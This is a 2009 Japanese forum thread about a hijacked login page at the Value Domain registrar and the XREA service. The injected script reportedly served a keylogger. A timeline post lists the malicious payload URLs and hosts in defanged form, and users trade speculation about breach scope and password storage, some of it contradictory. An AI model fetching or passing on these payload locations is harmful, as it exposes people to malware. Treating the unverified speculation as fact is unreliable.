それなら踏んだ時に、a.exe てのに反応してたから大丈夫かな。
ありがとです
779名無しさん@お腹いっぱい。:2009/07/09(木) 00:02:15 0
自分のコメント加えるなら引用部分には引用符か段落つけてよ
780名無しさん@お腹いっぱい。:2009/07/09(木) 00:03:30 0
>>778
a.exeが本体のキーロガーだそうです。>>93 >>95 >>97で検証されてます

598 名前:Name_Not_Found[sage] 投稿日:2009/07/08(水) 20:02:29 ID:???
暇なので、さらにチェク
無防備なWinXPを生けにえにささげ、exeをげと
んー、やっぱ普通にキーロガーですね。でもどこまで反応するかなー。特定アプリ(ネトゲ)にのみのターゲットかも
ネトゲまではいれてないしなー

とりあえず、本体までくるとどのセキュリティソフトでもNGっていってくるんで、
なにかセキュリティソフト入ってれば大丈夫でしょう。とりあえずはね
781名無しさん@お腹いっぱい。:2009/07/09(木) 00:20:02 0
まさに現在進行形なので、こっちのスレの情報もチェックしといた方が良いのでは

【アクセス解析】AccessAnalyzer.com Part5【XREA】
http://pc11.2ch.net/test/read.cgi/hp/1234096306/
782名無しさん@お腹いっぱい。:2009/07/09(木) 00:31:40 0
結局のところコレ食わされてるかどうかはどこ見て判断すればええのん?
783名無しさん@お腹いっぱい。:2009/07/09(木) 00:40:56 0


お名前.comに移管するなら、激安キャンペーンは明日の18時まで。
784名無しさん@お腹いっぱい。:2009/07/09(木) 00:43:15 0
GMOもちょっとなあ・・・
785名無しさん@お腹いっぱい。:2009/07/09(木) 00:46:02 0
700 :名無しさん@お腹いっぱい。 :2009/07/08(水) 20:10:18 0
>>690
まず次のところを見る:
http://www.domainname.ne.jp/

リンククラブは除外するのが無難:
http://www24.atwiki.jp/linkclub/

あとは696の紹介されたスレッドで聞くのが適当だと思う:

お前らお勧めのレジストラ教えてください
http://pc11.2ch.net/test/read.cgi/hosting/1010742997/l50
786名無しさん@お腹いっぱい。:2009/07/09(木) 00:52:30 0
お金に困ってるなら悩んでも仕方ないね。
設定内容的にはさくらで問題ないし、VD比で倍額になるとはいえ安心を金で買うと思えば。

ドメイン種別にもよるんだけれどね。マイナーなもの掴むと後で困るよな。
787名無しさん@お腹いっぱい。:2009/07/09(木) 00:57:45 0
信頼度
GMO>=さくら>>>>ロリポ>>>>>>>>>>>>>>>VD
788名無しさん@お腹いっぱい。:2009/07/09(木) 01:00:29 0
好感度
さくら>>>ロリポ>GMO>>>>>>>>>>>>>>>>>VD
789名無しさん@お腹いっぱい。:2009/07/09(木) 01:00:33 0
>>786
> 安心を金で買う

笑うところ?
790名無しさん@お腹いっぱい。:2009/07/09(木) 01:02:48 0
>>789
もしかして悔しがってる?
791名無しさん@お腹いっぱい。:2009/07/09(木) 01:04:26 0
ログインしたらaviraが反応したのでビビッた。
go[1].jpgは遮断してくれたが何か不安だな・・・。
792名無しさん@お腹いっぱい。:2009/07/09(木) 01:05:06 0
VDより更新料が高いところに移管するなら前もって有効期間を増やしておいたほうが節約になる?
793名無しさん@お腹いっぱい。:2009/07/09(木) 01:05:10 0
社名を挙げての移管先話は>>785記載のスレでやってね
794名無しさん@お腹いっぱい。:2009/07/09(木) 01:05:49 0
>>792
うん、いっぱいいっぱいまで増やしちゃだめかもしれんけれどね
795名無しさん@お腹いっぱい。:2009/07/09(木) 01:06:34 0
>>792
更新直後は移管できないんじゃなかったっけ。
うろ覚えスマソ
796名無しさん@お腹いっぱい。:2009/07/09(木) 01:06:37 0
ccTLDの自分には心中せないかんみたいだ…。
タイミングよくムームーにいけりゃいいんだが。
797名無しさん@お腹いっぱい。:2009/07/09(木) 01:12:50 0
VALUEDOMAINやWIKIWIKI.jpに仕掛けられたスクリプトから呼ばれる
msvidctl.dllスクリプトやswfやpdfがダウンロードし実行するexe。
ttp://www.virustotal.com/jp/analisis/59c9a0345aae2ee10a0d82fdbae5e87daf12568dfb6e41337283cf08eae63a51-1247059084
× ソースネクスト NOD32
798名無しさん@お腹いっぱい。:2009/07/09(木) 01:35:43 0
>>792
延長手続き後45日間経たずにレジストラを移管すると延長した手続きが無効になる
799名無しさん@お腹いっぱい。:2009/07/09(木) 01:38:49 0
js自体は消えたか消されたかしたみたいだけど、一時的にでもVDのFTPなりのパスワードが漏れたのは間違いないみたいだし
このままじゃ怖くてログインできないなあ
今はまだ待てるけど、これから数日なんのアナウンスもなくだんまり決め込まれたら参るなあ
つーか永遠にアナウンスなかったらどうすりゃいいんだよ
800名無しさん@お腹いっぱい。:2009/07/09(木) 01:41:47 0
大体パスワードなんて誰でも抜かれる可能性があるんだよね
どこのサーバーでもさ
やっぱり日本語パスワードを普及させるべきさね
801名無しさん@お腹いっぱい。:2009/07/09(木) 01:43:16 0
通例から考えると意地でも公式アナウンスはしないんだろうけど、今回はさすがにそれは無理かもね
802名無しさん@お腹いっぱい。:2009/07/09(木) 01:43:34 0
>>792
あと、更新しすぎに注意。
有効期限が9年以上先になると移管できなくなる

さらに、移管先でトラブって再度移管したいなんて事態が起きたときの為に
9年ギリギリではなく、5〜6年くらいの更新にしておいた方が無難かな?

以下はムームードメインより
>4.ドメインの残り有効期間が9年以上あるドメインは移管できません
>移管を行うと、現在のドメイン有効期間に1年が追加されます。
>残りの有効期間が9年以上 ある場合、最大契約期間を超えてしまう為、移管が行えません。
803名無しさん@お腹いっぱい。:2009/07/09(木) 01:45:02 0
keysysは知らないけど
eNomの再販業者なら延長手続きしても無効にならないかもしれないな
804名無しさん@お腹いっぱい。:2009/07/09(木) 01:45:35 0
そう連発で移管はしないだろうからってメインのには8年分つっこんだっけなあ
805名無しさん@お腹いっぱい。:2009/07/09(木) 01:46:13 0
自分も心中コースだ…ムームーでも取り扱ってない…
806名無しさん@お腹いっぱい。:2009/07/09(木) 01:49:00 0
何ドメイン?
807名無しさん@お腹いっぱい。:2009/07/09(木) 01:50:00 0
>>806
.chです
808名無しさん@お腹いっぱい。:2009/07/09(木) 01:51:42 0
.tkだよ、泣いていいか?
809名無しさん@お腹いっぱい。:2009/07/09(木) 01:52:56 0
普通にgTLDで良かったよ
810名無しさん@お腹いっぱい。:2009/07/09(木) 01:53:14 0
805は自分だが、.tkです >>808一緒に泣こう
811名無しさん@お腹いっぱい。:2009/07/09(木) 01:59:02 0
なんでそんな移管したいの?
よーわからん。
812名無しさん@お腹いっぱい。:2009/07/09(木) 01:59:38 0
それちょっと無理があるだろ
813名無しさん@お腹いっぱい。:2009/07/09(木) 02:05:35 0
>>796です

>>807 >>808 共に心中しようか…orz

ちなみに自分はco.ukとorg.ukです。
イギリス好きがここになって仇となるとは…。
814名無しさん@お腹いっぱい。:2009/07/09(木) 02:06:04 0
.tvにしといてよかった
でも国内業者だと扱っているところが少なくて限られてしまう
815名無しさん@お腹いっぱい。:2009/07/09(木) 02:09:07 0
>>813
>>810さんも仲間にいれてあげてー!
816名無しさん@お腹いっぱい。:2009/07/09(木) 02:11:25 0
国内でもマイナーccTLD扱ってるところは幾つかあるけど
移管に対応してるかが問題だな
817名無しさん@お腹いっぱい。:2009/07/09(木) 02:11:48 0
この流れはアレか
鯖の負荷を減らすための捨て身の移管促進策か
818名無しさん@お腹いっぱい。:2009/07/09(木) 02:12:00 0
こりゃいかん               あ
819名無しさん@お腹いっぱい。:2009/07/09(木) 02:14:18 0
ガチでVDで管理してるドメインが不安なんだが
移管まんどくせだし、VDまじで頑張ってくれ!
つか公式アナウンスを早くだして
まず事態の進捗状況と今後の対策をリリースしてくれ!
これ企業としての基本だからな。
820名無しさん@お腹いっぱい。:2009/07/09(木) 02:15:08 0
なんか、一気に移管モードONになっているやしが多いな。
まぁ焦るなよ。
821名無しさん@お腹いっぱい。:2009/07/09(木) 02:16:33 0
ポイント消化しないといけないし暫くは残るよ
822名無しさん@お腹いっぱい。:2009/07/09(木) 02:17:20 0
おれもco.ukだ...orz
823名無しさん@お腹いっぱい。:2009/07/09(木) 02:18:26 0
社員は焦ろや
824名無しさん@お腹いっぱい。:2009/07/09(木) 02:19:26 0
PHPの改竄前に、全ドメインの顧客情報が漏れていたのではないか?
という疑いを捨てきれない。(PHPを改竄できる権限があるならDBも見ることができた可能性を考慮)

ユーザーがすぐに気がつくJavaScriptでキーロガーを埋め込んだ理由は、
ハッキング済みだという犯行声明のようなものだったのではなかろうか?
ユーザーが他のサイトで使うIDやPASSをも狙ったキーロガーだったのかもしれないが、すぐに見つかるJavaScriptを使用する手口といい、PHPを改竄する権限がありながらわざわざやることでもないと思った次第。
825名無しさん@お腹いっぱい。:2009/07/09(木) 02:20:13 0
昨日ログインパスワードの変更をしたが、
12桁までしか入力できない。
ここは20桁くらいは許可しろよ>デジロック
まぁ、気休めだとは思うんだけどな。
826名無しさん@お腹いっぱい。:2009/07/09(木) 02:24:19 0
100桁入力できようが意味ねーよ
POSTデータ全部見ようと思えば見えるんだし
つかこの状況で変えたこと自体が自殺行為の可能性あり
827名無しさん@お腹いっぱい。:2009/07/09(木) 02:29:43 0
>>824
仮に、PHPを編集できる権限、つまりrootか、apacheファイルを
編集できる権限を使ったとします。
そして、データベースの接続先、IDとパスを抜き取った。

データベースを操作して、顧客データを抜く

ここからが問題。
パスワードを変えたユーザはとりあえず、犯人がDNSやネームの設定を変えることはできない。

ただし、デジロックが馬鹿でデータベース接続先、ID、パスを変更していない。

また抜かれる。

このパターンだと防御の策が無い。
デジロックは、真実を告知し、サーバーログの検証結果を明らかにすることだな。
828名無しさん@お腹いっぱい。:2009/07/09(木) 02:33:21 0
>>824
現状で可能性を言っても仕方がないが

PHPを書き換えるにはスクリプトかサーバソフトの脆弱性をついてプロセスを乗っ取ればできる
DBを見たり書いたりする権限はまったく別、スクリプトに記述されたパスなんか盗みみれば可能だが
どのファイルに記述されてるかわからないとできない

FTPパスが漏れていて書き換えられた場合も同様にFTPにアクセスできてもDBにはアクセスできない
後は上と一緒

個人情報が漏れるとしたらrootやかなり大きな権限が乗っ取られた場合と内部に犯人がいる場合

829名無しさん@お腹いっぱい。:2009/07/09(木) 02:35:45 0
普通DBにパスとか突っ込むときってハッシュで書き込むよな?
まさかDBにそのままパスワード突っ込むわけねぇだろ
830名無しさん@お腹いっぱい。:2009/07/09(木) 02:37:30 0
FTPパスが漏れていた場合、DBにアクセスするphpなりを自作し、そのphpを経由すれば簡単にアクセスできると思います。

>スクリプトに記述されたパスなんか盗みみれば可能だが
>どのファイルに記述されてるかわからないとできない
これについても、FTPパスがあれば、phpファイルを全取得して解析すれば、すぐに判明すると思いますよ。
831名無しさん@お腹いっぱい。:2009/07/09(木) 02:39:22 0
>>828

>PHPを書き換えるにはスクリプトかサーバソフトの脆弱性をついてプロセスを乗っ取ればできる
この説明がわからないのだが?具体的に

>FTPパスが漏れていて書き換えられた場合も同様にFTPにアクセスできてもDBにはアクセスできない
これだとスクリプトを落とせますよね?ソースを検索すればすぐにデータベースへの接続情報が探せると
思うんですが?
VDは、妙にユーザービリティが高く、パスワードの中身表示なんてご丁寧な機能がある

可逆できるBlowfishなどの暗号化技術を使ってるのと思われる。
まさか、生で格納していたとかの失態を犯していなければ。
ただし、Blowfishでも暗号化キーがFTPで抜かれれば、全く意味ないです。
832名無しさん@お腹いっぱい。:2009/07/09(木) 02:40:15 0
>>830
まぁね、でもそれ(個人情報を盗む事)が目的だったらPHPを書き換えてわざわざバレるような事するかな
833名無しさん@お腹いっぱい。:2009/07/09(木) 02:40:30 0
>>829
ハッシュのことをわかっていない愚か者は意見を書くな。
ハッシュは一歩的な暗号化で復元できません。
834名無しさん@お腹いっぱい。:2009/07/09(木) 02:40:35 0
ハッシュを使っているか使っていないかはphpファイルを解析する必要がありますが、
ハッシュ関数がバレて複合化できる可能性もあります。

835名無しさん@お腹いっぱい。:2009/07/09(木) 02:41:59 0
>>831

XSS 脆弱性 でググればたくさんでてくるよ
836名無しさん@お腹いっぱい。:2009/07/09(木) 02:44:07 0
>>835
XSSは知っています。
>プロセスを乗っ取れば
がさっぱりわかりませんが?
apacheのプロセスの乗っ取ってしまうのですか?
837名無しさん@お腹いっぱい。:2009/07/09(木) 02:45:59 0
>>834
PHPにいけるハッシュ関数はそんなにたくさんありませんし、
ハッシュの復号化はs、スタートレックのボーグの暗号化を解くのみたいに
簡単にはできないと思いますが。
838名無しさん@お腹いっぱい。:2009/07/09(木) 02:46:33 0
> でもそれ(個人情報を盗む事)が目的だったらPHPを書き換えてわざわざバレるような事するかな

なぜ既に盗み終わったぜheheheだと考えないのか。。
839名無しさん@お腹いっぱい。:2009/07/09(木) 02:47:27 0
> PHPにいけるハッシュ関数はそんなにたくさんありませんし

自前でロジック書けばorコピペすればなんでも使えるだろハゲ
840名無しさん@お腹いっぱい。:2009/07/09(木) 02:47:52 0
>>833
MD5の復号化について、おもしろい記事があるので紹介します。
http://en.yummy.stripper.jp/?eid=719489

「復号できない」というのは「復号するアルゴリズムがない」というだけの話で、視点を変えれば復号できないことはないのだ。

・・・と続きます。ちょっと難しいですけどね。
841名無しさん@お腹いっぱい。:2009/07/09(木) 02:48:16 0
>>836
権限を奪って何かを実行しようとすればプロセスが生じるでしょう?
842名無しさん@お腹いっぱい。:2009/07/09(木) 02:48:50 0
>>839
デジロックに数学学者っていましたっけ?
とりあえず、肌が白い人種以外で新しいハッシュアルゴリズム組むなんて
壮大な社員がいるのでしょうか?デブ
843名無しさん@お腹いっぱい。:2009/07/09(木) 02:49:51 0
>842
> コピペすれば
844名無しさん@お腹いっぱい。:2009/07/09(木) 02:50:52 0
>>831
>VDは、妙にユーザービリティが高く、パスワードの中身表示なんてご丁寧な機能がある
とのことですので、パスワードを複合化することも簡単にできそうですね。
845名無しさん@お腹いっぱい。:2009/07/09(木) 02:52:02 0
>>841
PHPのことを良く知りもせずに書くのはやめようね。
system()関数やexec()関数を実行してプロセスを起こすと言いたいのでしょうか?
OSコマンドインジェクションのことなのかな?
846名無しさん@お腹いっぱい。:2009/07/09(木) 02:55:01 0
>>844
だから、PEARライブラリのBlowfishを使っていると言っているのですよ。
PHPにおける復号化できる暗号化
847名無しさん@お腹いっぱい。:2009/07/09(木) 02:56:07 0
>>845
俺が言いたかったのはPHPのファイルを書き換えるのに DBを読む権限までは必要ないということですよ
あんま瑣末なことに噛み付かれても困るんですけど
848名無しさん@お腹いっぱい。:2009/07/09(木) 03:01:59 0
可能性とか想像ってのは無限大なんだな。
基準も人それぞれ違うから人に押し付ける必要はないんだよ。
自信が無いから押し付けたくなるんだよな、きっと。笑って見守ろっと。
849名無しさん@お腹いっぱい。:2009/07/09(木) 03:03:51 0
寝ないで頑張るほどのことなのか
おやすみ
850名無しさん@お腹いっぱい。:2009/07/09(木) 03:04:40 0
tkは知らないけどco.uk、org.ukなら
国内でも移管に対応してる業者はある
851829:2009/07/09(木) 03:05:03 0
>>833 あれ?なんか俺変なこと書いたか?
ハッシュをDBにつっこむ→DBみれても普通はパス割れすることは稀
と書きたかったのだが。
あと「一歩的な暗号化」ってなにかおしえてくれ。意味がわからん
852名無しさん@お腹いっぱい。:2009/07/09(木) 03:05:07 0
>>847
一般論ですが、XSSとは、例えば掲示板で危険なJSをリンク先に設定したリンクを
投稿したりして、他の閲覧者を危険に陥れる行為と指します。
今回のlogin.phpを改ざんするのはXSSとは言えない永続的な改ざんですね。
PHPファイルそのものを書き換えてしまうようなケースは他のアプリの脆弱性が農耕じゃないですか?
853名無しさん@お腹いっぱい。:2009/07/09(木) 03:07:57 0
>>852
濃厚とか可能性を言ってもしょうがないけどって最初に断ってるでしょ
XSSにはスクリプトやサーバソフト脆弱性をついたものもありますよ
裁判じゃないんだからそんなに厳密な話をしたいなら勝手にどうぞ
854名無しさん@お腹いっぱい。:2009/07/09(木) 03:09:05 0
>>851
ハッシュは、例えばPHPにおける代表的なMD5ってのは、
パスワードを謎の文字列にハッシュ化します。

しかし、それを復元して、もとのパスワードに戻すことは
できないという意味です(壮大な復元化作業は非効率で現実的でない)

ハッシュ化された文字列はデジロックの人間でさえ、元のパスワードを
知ることはできない。

よって、パスワード再発行は、新しいパスワードの上書きによって成り立ちます。
855名無しさん@お腹いっぱい。:2009/07/09(木) 03:10:08 0
想像と不安
・VDアカウントのパスワードはさすがに暗号化してDB保存されてるだろう
・しかしDBにアクセスするID,PW等はPHPファイルに生書きじゃないか?
・login.phpに書き込める権限があるなら、中身見る権限もありそう
・XREAのFTPアカウントやPWは利便性重視でDBに生書きじゃないか?
856名無しさん@お腹いっぱい。:2009/07/09(木) 03:10:15 0
アプリの脆弱性
より
FTPパスなりが漏れた
では?
857名無しさん@お腹いっぱい。:2009/07/09(木) 03:11:12 0
>>854 んなこたわかって書いてるつもりだがなにか俺の書き込みに問題あったか?
858名無しさん@お腹いっぱい。:2009/07/09(木) 03:12:30 0
>846
> PHPにおける復号化できる暗号化
だから、なぜ Blowfish だと言い切れる?
一番簡単に使えるからといって、採用しているとは限らない。
可逆アルゴリズムはいくらでもあるわけで。

>851
だぶん「一方的」って書きたかったんだと思うよ。
俺も、しばらくわからなかったけど。
859名無しさん@お腹いっぱい。:2009/07/09(木) 03:12:41 0
>>850
まじですか。ぐぐってみます。
高くない事を祈るのみ…。
860名無しさん@お腹いっぱい。:2009/07/09(木) 03:13:08 0
>>855
>・VDアカウントのパスワードはさすがに暗号化してDB保存されてるだろう
これについては、答えが出ている

>>831
によると、たとえ暗号化されていても、パスワードは簡単にゲットできそうですよ
861829:2009/07/09(木) 03:15:19 0
>>858 「一方的」かw了解w




んなこたわかってるよwなんで分かってないから黙ってろなんて言われなきゃならんのかww
862名無しさん@お腹いっぱい。:2009/07/09(木) 03:15:51 0
>>858
ベイビーよく読んでくれよ

>Blowfishなど

「など」
863名無しさん@お腹いっぱい。:2009/07/09(木) 03:16:54 0
まず、現時点でphpは盗聴・改竄されていると思われる。
よって、パスワードのリマインダが存在するのならば、それも同様に盗聴・改竄可能な状態だと思われる。
そして、phpから読み書きできる範囲のDBも全て盗聴・改竄されていると思われる。

結論。
どんな方法使っていようが、プログラムの実行権限奪われた時点で詰み。
ワーストケースなら全ての情報は抜かれている。
864名無しさん@お腹いっぱい。:2009/07/09(木) 03:20:14 0
自分のアカウントを使って、
OSインジェクションや、SQLインジェクション、NULLバイト攻撃なんて試す馬鹿はいないと思うので、
脆弱性だらけかも?は否定できないな。今後も試す予定ないけどなw
865名無しさん@お腹いっぱい。:2009/07/09(木) 03:20:16 0
>>863
同意見です。
デジロがどこまで正直に情報公開するかが問題です。
866名無しさん@お腹いっぱい。:2009/07/09(木) 03:23:03 0
パスワードを混同してる奴がいる。
VDにログインするパスワード→複合化して画面に表示する機能ナシ
VDログイン後、XREAの管理画面内のFTPパスワード等→画面に表示する機能有り

どっちにしても863に同意
867名無しさん@お腹いっぱい。:2009/07/09(木) 03:23:55 0
>>862

>846 : 名無しさん@お腹いっぱい。 [sage] DATE:2009/07/09(木) 02:55:01 0
>>844
>だから、PEARライブラリのBlowfishを使っていると言っているのですよ。
>PHPにおける復号化できる暗号化。

えっ?
「など」はどこにあるの?
868名無しさん@お腹いっぱい。:2009/07/09(木) 03:25:57 0
それと、誰かnamedに詳しい奴が、
namedの改善指示書を送ってくれんかな。
chroot入れてるか?とかね。
869名無しさん@お腹いっぱい。:2009/07/09(木) 03:28:21 0
>>855
>・VDアカウントのパスワードはさすがに暗号化してDB保存されてるだろう

ttps://www.value-domain.com/modprof.php
「現パスワードの確認」

どう見ても生保存です本当にありがとうございました
870名無しさん@お腹いっぱい。:2009/07/09(木) 03:29:33 0
終わた
871名無しさん@お腹いっぱい。:2009/07/09(木) 03:30:17 0
>>869
マジですか!
この騒動でログインしておりませんでした。
本当にありがとうございました
872名無しさん@お腹いっぱい。:2009/07/09(木) 03:30:21 0
さっきから復号の話をしてるっつーのに
表示するときに元に戻してる可能性は全否定ですかそうですか
873名無しさん@お腹いっぱい。:2009/07/09(木) 03:30:35 0
この非常事態を知らないVDユーザー大勢いるだろうな。
874名無しさん@お腹いっぱい。:2009/07/09(木) 03:31:29 0
デジロックが運営しているのは
そこらのショッピングサイトとはワケが違う。

ドメインサービスとかレンタルサーバを運営しているようなとこが
今回の件についてまだ何のアナウンスもないってだけで
不信感つのりまくりだわ。

もしアナウンスや対策などせずこのままだんまりだったら、
ccTLD使ってようがなんだろうが他に移る。


875名無しさん@お腹いっぱい。:2009/07/09(木) 03:31:54 0
>>869 Cookieけしてみな
876名無しさん@お腹いっぱい。:2009/07/09(木) 03:32:27 0
>>872
869が復号化の画面を案内したでしょ?
VDのパスワードは100%復号化できますよってこと。
877名無しさん@お腹いっぱい。:2009/07/09(木) 03:32:29 0
>>872
>表示するときに元に戻してる可能性は

そんなもんPHPソース見れたらバレバレだろ。生保存と同列。
878名無しさん@お腹いっぱい。:2009/07/09(木) 03:34:52 0
クッキーに保存してんのかよ。
だったらハッシュの可能性も捨てきれない
879875:2009/07/09(木) 03:36:30 0
ああ、いやパスワードをメールで送るってことは復号化できるってことか
楽観論でいけるかとおもってたけどやばいな。パス生保存されてる可能性があるなら
全員抜かれる可能性は否定できないや。
880名無しさん@お腹いっぱい。:2009/07/09(木) 03:37:30 0
しかしメアド抜かれた時点で、パスの再発行できるわけで、
いずれにしても何でもできrわな。
クレカだけだな。これだけは抜かれていない。毎回入力だからな。
変なもの仕込まれてたら、抜けあかもしれんが。

そうそう、login.phpでSSL通信できるみたいだから、少しは抵抗してみるとか?
881名無しさん@お腹いっぱい。:2009/07/09(木) 03:38:51 0
ことセキュリティ問題に関しては楽観論は危険だろ
882名無しさん@お腹いっぱい。:2009/07/09(木) 03:38:58 0
本当にありがとうございました
883名無しさん@お腹いっぱい。:2009/07/09(木) 03:39:39 0
オワタな状況は変わらないって事ですね。わかります。
884名無しさん@お腹いっぱい。:2009/07/09(木) 03:41:30 0
それに関しては当分変わらんよ
885名無しさん@お腹いっぱい。:2009/07/09(木) 03:41:49 0
漏洩事件の多くは社内犯行だからな。合掌です。
886名無しさん@お腹いっぱい。:2009/07/09(木) 03:42:55 0
>>881 ページ書き換え程度で無用心な閲覧者にキーロガかます
のが目的ならまだ楽観してもいいんではないか?

これ仕込んだ奴の目的が鯖の情報抜く事だったら楽観もしてられない。
なんにせよXREAはある程度サービス止めてでも速対応しないといけない。
しなけりゃ倒産が待ってる。
887名無しさん@お腹いっぱい。:2009/07/09(木) 03:43:08 0
アナウンスする気ないんかなぁ…
888名無しさん@お腹いっぱい。:2009/07/09(木) 03:44:55 0
そもそも、
魚拓の信頼性は?から
なんで、書き換えられたのが「事実」に変わったんだっけ?
889名無しさん@お腹いっぱい。:2009/07/09(木) 03:45:29 0
>>886

PHPの改竄前に、全ドメインの顧客情報が漏れていたのではないか?
という疑いを捨てきれない。(PHPを改竄できる権限があるならDBも見ることができた可能性を考慮)

誰かがすぐに気がつくJavaScriptでキーロガーを埋め込んだ理由は、
ハッキング済みだという犯行声明のようなものだったのではなかろうか?
ユーザーが他のサイトで使うIDやPASSをも狙ったキーロガーだったのかもしれないが、すぐに見つかるJavaScriptを使用する手口といい、PHPを改竄する権限がありながらわざわざやることでもないと思った次第。
890名無しさん@お腹いっぱい。:2009/07/09(木) 03:47:01 0
>>889
> ハッキング済みだという犯行声明のようなものだったのではなかろうか?
深く考えすぎ。スクリプトキディなんでしょ。
891名無しさん@お腹いっぱい。:2009/07/09(木) 03:48:43 0
このスレを見ている人はこんなスレも見ています。(ver 0.20)

   納得   【アクセス解析】AccessAnalyzer.com Part5【XREA】 [Web制作]
   納得   GENOウイルススレ ★22 [セキュリティ]
   納得   【Geno再来?】某有名レンタルサーバがやられた【新手法】 [ニュース速報]
まぁ納得   電話工事屋さんよ、熱く語れ!!8軒目 [通信技術]
誰だよw   女の半数がHの悩み「やりたくてたまらないのに露骨に誘えない」「彼氏の方が、私より性欲が弱い」 [ニュース速報]
892名無しさん@お腹いっぱい。:2009/07/09(木) 03:49:01 0
>>890 おれもそんなかんじかとおもってたけど
ちょっと楽観視できなくなってきたな。
これで糞対応だったらマジ捨てる
893名無しさん@お腹いっぱい。:2009/07/09(木) 03:55:47 0
いまのデジロはクラックしたやつのIP割り出す事すらできなさそうで不安だ
894名無しさん@お腹いっぱい。:2009/07/09(木) 03:57:08 0
>>863
が正論

>結論。
>どんな方法使っていようが、プログラムの実行権限奪われた時点で詰み。
この言葉に集約されている。

もう何が起きようと驚かないよ。

>誰だよw   女の半数がHの悩み「やりたくてたまらないのに露骨に誘えない」「彼氏の方が、私より性欲が弱い」 [ニュース速報]
なんかワロタ
895名無しさん@お腹いっぱい。:2009/07/09(木) 03:57:51 0
IPで犯人特定なんて時代遅れです。
896名無しさん@お腹いっぱい。:2009/07/09(木) 04:01:31 0
さておれも移管するかな
897名無しさん@お腹いっぱい。:2009/07/09(木) 04:01:31 0
つかまだサイトにjsファイルがあってワロタw
いや笑えないか、まだデジロは事態を把握してないのかね
898名無しさん@お腹いっぱい。:2009/07/09(木) 04:01:44 0
>>889
VDのパスワード全部盗っててもそれで終わりじゃない
キーロガー仕込めば他のパスワードも盗れる可能性が出てくる
目的はVDのパスワードだけじゃないってことだろ
899名無しさん@お腹いっぱい。:2009/07/09(木) 04:04:13 0
パスワードってそこら十で同じものつかう焼房がいるので、
ほんと宝の山では?
900名無しさん@お腹いっぱい。:2009/07/09(木) 04:06:34 0
ほんと・・・なんでこんな信用できないところと契約してしまったんだろ・・
今までの対応がホント糞だったのに、ネームバリューだけで・・・悔やまれる
901名無しさん@お腹いっぱい。:2009/07/09(木) 04:08:32 0
>>889
はコピペするほどの論じゃねーだろw
902名無しさん@お腹いっぱい。:2009/07/09(木) 04:13:55 0
移管されたくないから対応しないんじゃ
903名無しさん@お腹いっぱい。:2009/07/09(木) 04:14:25 0
>>895 俺もトレンドに乗りたいから教えてください
904名無しさん@お腹いっぱい。:2009/07/09(木) 04:19:48 0
>>902
対応しないから不安で移管決めたんだが。
905名無しさん@お腹いっぱい。:2009/07/09(木) 04:28:17 0
まさに詰み
906名無しさん@お腹いっぱい。:2009/07/09(木) 04:32:12 P
長澤
907名無しさん@お腹いっぱい。:2009/07/09(木) 04:37:47 0
■VALUE DOMAIN/XREA 不正改竄問題の流れまとめ■

07/06 VALUE DOMAINのログイン画面に不正なJSが挿入される改竄が発見される
   ログイン画面 (A) ttp://www.value-domain〆.com/login.php は
   (B) ttp://1856317799〆:888/s.js を呼び出している
   (C) ttp://110.165.41.103〆:888/dir/m.htm を呼び出している
   (D) ttp://110.135.41.103〆/dir/show.php を呼び出している
 ↓
07/06 魚拓が取得される
    ttp://s03.megalodon.jp〆/2009-0706-1843-51/https://www.value-domain.com/login.php
 ↓
07/06 (C)にノーガードのXPでアクセスしたところキーロガーが検出・ダウンロードされた
 ↓
07/07 MSからアドバイザリ、IPAからアナウンスが出る
    http://www.microsoft.com/japan/technet/security/advisory/972890.mspx
    http://www.ipa.go.jp/security/ciadr/vul/20090707-ms-activex.html
 ↓
07/07 (A)のlogin.phpから不正なjsコードが削除される
   (VD側が削除したのか、不正アクセス元が削除したのかは不明)
 ↓
07/07 以前xreaで発生した改竄との関連が指摘される
   http://sb.xrea.com/showthread.php?p=84465
 ↓
07/08 AccessAnalyzerのログイン画面に不正なJSが挿入される改竄が発見される
   ログイン画面 (E) ttp://ax.xrea.〆com/login.php
   (F) ttp://1856317799〆:888/jp.js を呼び出している
   (G) ttp://0x6EA52967〆:888/dir2/show.php を呼び出している
   (H) ttp://0x6EA52967〆:888/dir2/go.jpg を呼び出している
   (I) ttp://1856317799〆:888/counter.htm を呼び出している
   (※注意 (E)への改竄は07/09現在まだ削除・修正されていない)
 ↓
07/09 現在までVDからの公式アナウンスなし ←いまここ
908名無しさん@お腹いっぱい。:2009/07/09(木) 04:38:56 0
このスレだけまとめてみたけど、こんな感じ?
909名無しさん@お腹いっぱい。:2009/07/09(木) 04:39:18 0
>>907
ぐっジョブ、おつかれしたっ
910名無しさん@お腹いっぱい。:2009/07/09(木) 04:45:44 0
>>907
付け加えるなら、

07/06 login.phpが改竄される以前に、全ドメインの個人情報DBが抜かれている可能性がある

ってことかな
コレが一番怖い!
911名無しさん@お腹いっぱい。:2009/07/09(木) 04:50:55 0
関連のアクアナの方は現在も改竄されっぱなしだから、一連のデジロ系改竄としてそっちの方もまとめて欲しい。
912名無しさん@お腹いっぱい。:2009/07/09(木) 05:42:55 0
913名無しさん@お腹いっぱい。:2009/07/09(木) 05:49:29 0
事故でウイルスまいちゃうのは、仕方ないとしても、
いつまでも放置して撒き散らし続けると、罰せられるし、損害賠償責任発生するんじゃねーの?
現実のウイルスだってそーだろ。
914名無しさん@お腹いっぱい。:2009/07/09(木) 05:51:02 0
>>912
だから直リンするなって
915名無しさん@お腹いっぱい。:2009/07/09(木) 06:07:26 0
LV30だから分からないんだけど、ja.wikipedia.org/wiki/ってのは関係無いんだよね?
916名無しさん@お腹いっぱい。:2009/07/09(木) 06:16:56 0 BE:2087410897-2BP(0)
x1.ax.xrea.com たぶんおk
x2.ax.xrea.com なんかおる
x3.ax.xrea.com たぶんおk

本当にただのキーロガーでいいのか shellだぞ 実体をばらしてよくみるんだ
実体はa.exe(攻撃鯖側名称とは異なる)ではなく、そいつが産み落とすサービスDLL

ばりゅどめ/xreaはなにをもたついてるんだ 攻撃側が本気だしてきたら(ry
917名無しさん@お腹いっぱい。:2009/07/09(木) 07:03:36 0
こりゃネームサーバの障害は更に一ヵ月は直りそうにないな…
918名無しさん@お腹いっぱい。:2009/07/09(木) 07:30:10 0
今知った
どうなってんだこれ
ドメインの延長しようと思ったんだがどうすりゃいいんだ
もう期限迫ってるからややこしい事できん
919名無しさん@お腹いっぱい。:2009/07/09(木) 07:36:04 0
まだこれは最終調教への序章かも知れん
920名無しさん@お腹いっぱい。:2009/07/09(木) 07:36:36 0
おれなら期間を短くして時間かせぎかな、
でもクレカの番号はもう入力したくねぇな
921名無しさん@お腹いっぱい。:2009/07/09(木) 08:27:45 0
